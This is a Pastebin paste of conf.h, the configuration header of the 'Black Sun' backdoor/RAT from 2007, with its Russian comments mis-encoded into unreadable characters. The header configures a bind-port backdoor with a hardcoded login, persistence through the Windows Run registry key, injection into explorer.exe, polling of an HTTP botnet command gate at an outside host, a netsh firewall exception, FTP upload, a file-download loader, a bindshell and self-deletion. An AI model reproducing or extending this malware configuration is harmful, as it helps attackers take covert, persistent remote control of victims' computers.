API tools faq
paste
Advertisement
FlyFar

src/conf.h

FlyFar
May 17th, 2024
468
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.04 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  *  ---------------------------------------------------------------------
  3.  *         ____  _            _     _____            
  4.  *        |  _ \| |          | |   / ____|            
  5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
  6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
  7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
  8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
  9.  *                 Black Sun Backdoor v1.0 prebeta        
  10.  *
  11.  *                          (x) Cytech 2007
  12.  *
  13.  *  ---------------------------------------------------------------------
  14.  *  [conf.h]
  15.  *      Êîíôèãóðàöèîííûé ôàéë RAT. Ïîäðîáíåå â README
  16.  *  ---------------------------------------------------------------------
  17.  */
  18.  
  19.     // -------------- [  íàñòðîéêè áýêäîðà ]  -------------- //
  20.    
  21.     // ïîðò áýêäîðà
  22.     #define     BINDPORT        2121
  23.    
  24.     // ëîãèí:ïàðîëü
  25.     #define     AUTH            "cytech:cytech"
  26.    
  27.     // -------------- [ ñèñòåìíûå íàñòðîéêè ]  -------------- //
  28.    
  29.     // èìÿ ôàéëà â äèðåêòîðèè system32
  30.     #define     EXENAME         "blacksun.exe"
  31.    
  32.     // êëþ÷ â ðååñòðå (HKEY_LOCAL_MACHINE)
  33.     #define     REGKEY          "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
  34.    
  35.     // íàçâàíèå ïîäêëþ÷à
  36.     #define     REGNAME         "blacksun"  
  37.    
  38.     // èìÿ ìóòåêñà
  39.     #define     MUTEXNAME       "{F3532CE1-0832-11B1-A122-25000A276A73}"
  40.    
  41.     // ïðîöåññ, â êîíòåêñòå êîòîðîãî áóäåì ðàáîòàòü
  42.     #define     FIRSTINJPROC    "explorer.exe"  
  43.     // íåîáõîäèìî îòìåòèòü, ÷òî åñëè â êà÷-âå ïðîöåññà âû âûáðàëè svchost.exe, òî âûâîäèòü MessageBox
  44.     // íà óäàëåííîé ñèñòåìå áóäåò íåëüçÿ!
  45.    
  46.     // -------------- [  íàñòðîéêè http-áîòà ]  -------------- //
  47.    
  48.     // èñïîëüçîâàòü ãåéò? åñëè íåò, òî çàêîìåíòèðóéòå ýòó ñòðîêó
  49.     #define     USEGATE
  50.    
  51.     // ïðèìåð http://fuckinghost.org/blacksun/getcommand.php
  52.    
  53.     // ñåðâåð íà êîòîðîì ñòîèò ãåéò
  54.     #define     HTTPSERV        "fuckinghost.org"  
  55.    
  56.     // ïîðò httpd
  57.     #define     HTTPPORT        80         
  58.    
  59.     // ïóòü äî ñêðèïòà getcommand.php
  60.     #define     HTTPPATH        "/botnet/getcommand.php"   
  61.    
  62.     // user-agent. ðóêàìè íå òðîãàòü!
  63.     #define     USERAGENT       "blacksun" 
  64.    
  65.     // ÷àñòîòà îáðàùåíèÿ áýêäîðà ê ãåéòó (ìèíóòû)
  66.     #define     HTTPFREQ        15     
  67.    
  68.     // -------------- [  âòîðîñòåïåííûå ïàðàìåòðû ]  -------------- //
  69.    
  70.     // èñïîëüçîâàòü äîáàâëåíèå â netsh firewall? åñëè íåò, òî çàêîìåíòèðóéòå ýòó ñòðîêó
  71.     #define     NETSHADD      
  72.    
  73.     // íàèìåíîâàíèå "êëèåíòà" ïðè çàêà÷êå ôàéëîâ ïî FTP
  74.     #define     FTP_UPLOAD_CLIENT   "Blacksun-FTP-client"
  75.    
  76.     // àäðåñ, ãäå ëîàäåð áóäåò õðàíèòü äàííûå î ïîñëåäíåì ñêà÷åííîì ôàéëå
  77.     #define     DATAKEY         "Software\\Microsoft\\Windows"
  78.    
  79.     // íàèìåíîâàíèå áàòíèêà ñîçäàâàåìîãî ïðè ñàìîóäàëåíèè
  80.     #define     SELFDEL_BAT         "self.bat"
  81.    
  82.     // -------------- [  ñîîáùåíèÿ äëÿ êëèåíòà ]  -------------- //
  83.    
  84.     // òåêñòû ñîîáùåíèé îòïðàâëÿåìûõ ñåðâåðîì êëèåíòó ïðè âûïîëíåíèè êîìàíä
  85.     #define     MSG_DONE            "\n done \n"
  86.     #define     MSG_ERROR           "\n error \n"
  87.     #define     MSG_AUTHFAILED      "\n authroization failed \n"
  88.     #define     MSG_UNKNOWNARG      "\n unknown argument 2 \n"
  89.     #define     MSG_UNKNOWNCMD      "\n unknown command \n"
  90.     #define     MSG_CMDEXECUTED     "\n command executed \n"
  91.     #define     MSG_MSGBOX          "\n messagebox ok \n"
  92.     #define     MSG_BINDSH          "\n check bindshell now \n"
  93.     #define     MSG_EXITPROC        "\n terminating process... \n"
  94.     #define     MSG_KILLSELF        "\n selfdestruction started... \n"
  95.     #define     MSG_LOADER_OK       "\n file downloaded \n"
  96.     #define     MSG_LOADER_ERROR    "\n error downloading file \n"
  97.     #define     MSG_LOADER_SEH      "\n SEH: failed URLDownloadToFile call \n"
  98.     #define     MSG_EXECHIDE        "\n execution in HIDE mode done \n"
  99.     #define     MSG_EXECSHOW        "\n execution in SHOW mode done \n"
  100.     #define     MSG_EXECERROR       "\n error. cant execute \n"
  101.     #define     MSG_CONNECTERROR    "\n error. cant connect \n"
  102.     #define     MSG_FTPUPLOAD       "\n uploaded succesfull \n"
  103.     #define     MSG_CDROMOPENED     "\n cdrom opened \n"
  104.     #define     MSG_CDROMCLOSED     "\n cdrom closed \n"
  105.     #define     MSG_MONON           "\n monitor on \n"
  106.     #define     MSG_MONOFF          "\n monitor off \n"
  107.     #define     MSG_WALLPSET        "\n wallpaper setuped, if wallpaper's format was BitMap (*.bmp) \n"
  108.     #define     MSG_SHUTDOWNPRIV    "\n cant set shutdown privilege \n"
  109.     #define     MSG_REBOOT          "\n rebooting... \n"
  110.     #define     MSG_SHUTDOWN        "\n shutdowning... \n"
  111.     #define     MSG_LOGOFF          "\n setting logoff mode... \n"
  112.     #define     MSG_SLEEP           "\n setting sleep mode... \n"
  113.     #define     MSG_STAND           "\n standing by... \n"
  114.     #define     MSG_SWAPMOUSE       "\n mouse swapped \n"
  115.     #define     MSG_UNSWAPMOUSE     "\n mouse unswapped \n"
  116.  
  117.     char
  118.     VERSION[]=
  119.     "\n :: BlackSun Remote Administrative Tool v1.0 prebeta :: "
  120.     "\n        Darkcoded by Cytec, Hell Knights Crew          "
  121.     "\n                 hellknights.void.ru                    ";
  122.    
  123.     // -------------- [  ðóêàìè íå òðîãàòü! ]  -------------- //
  124.    
  125.     // àäðåñ áàçû
  126.     #define     BASEADDRESS     0x29A00000  
  127.     // ïðèâåëåãèè îòëàä÷èêà
  128.     #define     SE_DEBUG_PRIV       "SeDebugPrivilege"
  129.    
  130.     // íàèìåíîâàíèÿ DLL
  131.     #define     KERNEL32_DLL        "kernel32.dll"
  132.     #define     ADVAPI32_DLL        "advapi32.dll"
  133.     #define     SHELL32_DLL         "shell32.dll"
  134.     #define     WS2_32_DLL          "ws2_32.dll"
  135.     #define     URLMON_DLL          "urlmon.dll"
  136.     #define     WININET_DLL         "wininet.dll"
  137.     #define     WINMM_DLL           "winmm.dll"
  138.     #define     IMGHLP_DLL          "imagehlp.dll"
  139.     #define     USER32_DLL          "user32.dll"
  140.    
  141.     // netsh
  142.     #define     NETSH_ADD_1         "netsh firewall set allowedprogram "
  143.     #define     NETSH_ADD_2         " blacksun ENABLE"
  144.    
  145.     // comspec
  146.     #define     COMSPEC             "ComSpec"
Tags: malware source code Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!